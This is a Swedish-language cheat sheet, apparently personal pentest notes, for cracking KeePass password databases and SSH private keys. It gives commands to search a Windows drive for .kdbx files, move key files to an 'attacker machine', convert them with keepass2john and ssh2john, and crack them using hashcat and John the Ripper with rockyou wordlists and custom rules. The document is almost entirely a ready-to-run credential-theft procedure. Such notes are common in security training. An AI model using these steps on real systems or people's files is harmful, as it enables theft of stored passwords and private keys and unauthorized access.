4. KeePass & SSH-key Crack

KeePass Hash Crack:

  1. Lokalisera databas-filen:
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
  1. För över filen till Linux.
  2. Konvertera den till hash-format:
keepass2john Database.kdbx > keepass.hash
  1. Redigera filen och ta bort eventuellt "användarnamn"
  2. Ta reda på hash-ID:t för Hashcat:
hashcat --help | grep -i "KeePass"
  1. Förbered eventuell regel fil som '.rule'
  2. Cracka skiten:
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
  1. Öppna databasen med "kpcli":

SSH-key Crack:

  1. Lokalisera id_rsa-fil och för över till lokal angriparmaskin.
  2. Konvertera till hash-format:
ssh2john id_rsa > ssh.hash
  1. Skapa regelfil om behövs, och lägg till obligatorisk första rad. Ex.
[List.Rules:<regelnamn>]
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#
  1. Appenda nya regelfilen till /etc/john/john.conf:
sudo sh -c 'cat <regelfil> >> /etc/john/john.conf'
  1. Cracka skiten:
john --wordlist=<ordlista> --rules=<regelnamn> ssh.hash

John hash-cracking:

#Ta reda på hashtypen
hashid -e -j '<hash>'
hash-identifier <hash>

#Cracka med dictionary
john --wordlist=rockyou.txt --rules=regelnamn --format=<hashidformat> hash.txt

#Visa hashen igen
john --show pass.txt

Best john rules: https://charlesreid1.com/wiki/John_the_Ripper/Rules#Install_the_Rules

List all John rules:

for ruleset in `grep KoreLogicRules /etc/john/john.conf | cut -d: -f 2 | cut -d\] -f 1`; do echo ${ruleset}; done